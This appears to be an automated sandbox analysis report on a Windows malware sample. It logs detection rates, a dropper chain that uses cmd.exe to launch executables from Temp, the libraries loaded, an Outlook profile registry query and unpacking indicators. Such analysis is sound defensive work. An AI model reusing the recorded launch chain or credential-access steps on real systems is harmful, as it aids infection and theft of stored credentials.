Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: EZrw1nNIpG.exe ReversingLabs: Detection: 50%
Source: EZrw1nNIpG.exe Virustotal: Detection: 54%
Source: KKEBKJJDGH.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explortu.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explortu.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File read: C:\Users\user\Desktop\EZrw1nNIpG.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\EZrw1nNIpG.exe "C:\Users\user\Desktop\EZrw1nNIpG.exe"
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJKFIIIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe"
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe "C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe" Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJKFIIIJ.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe "C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe" Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: EZrw1nNIpG.exe Static file information: File size 2535424 > 1048576
Source: EZrw1nNIpG.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x227c00
Source: Binary string: mozglue.pdbP source: EZrw1nNIpG.exe, 00000000.00000002.2417867750.000000006C83D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: EZrw1nNIpG.exe, 00000000.00000002.2417867750.000000006C83D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Unpacked PE file: 0.2.EZrw1nNIpG.exe.810000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Unpacked PE file: 8.2.KKEBKJJDGH.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 10.2.explortu.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 11.2.explortu.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Unpacked PE file: 13.2.3eb62d09c2.exe.d00000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 15.2.explortu.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 17.2.explortu.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C82C410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: explortu.exe.8.dr Static PE information: real checksum: 0x1de832 should be: 0x1e2c33
Source: random[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x26d947
Source: KKEBKJJDGH.exe.0.dr Static PE information: real checksum: 0x1de832 should be: 0x1e2c33
Source: 3eb62d09c2.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x26d947
Source: EZrw1nNIpG.exe Static PE information: real checksum: 0x0 should be: 0x27a056
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1de832 should be: 0x1e2c33
PE file contains sections with non-standard names
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
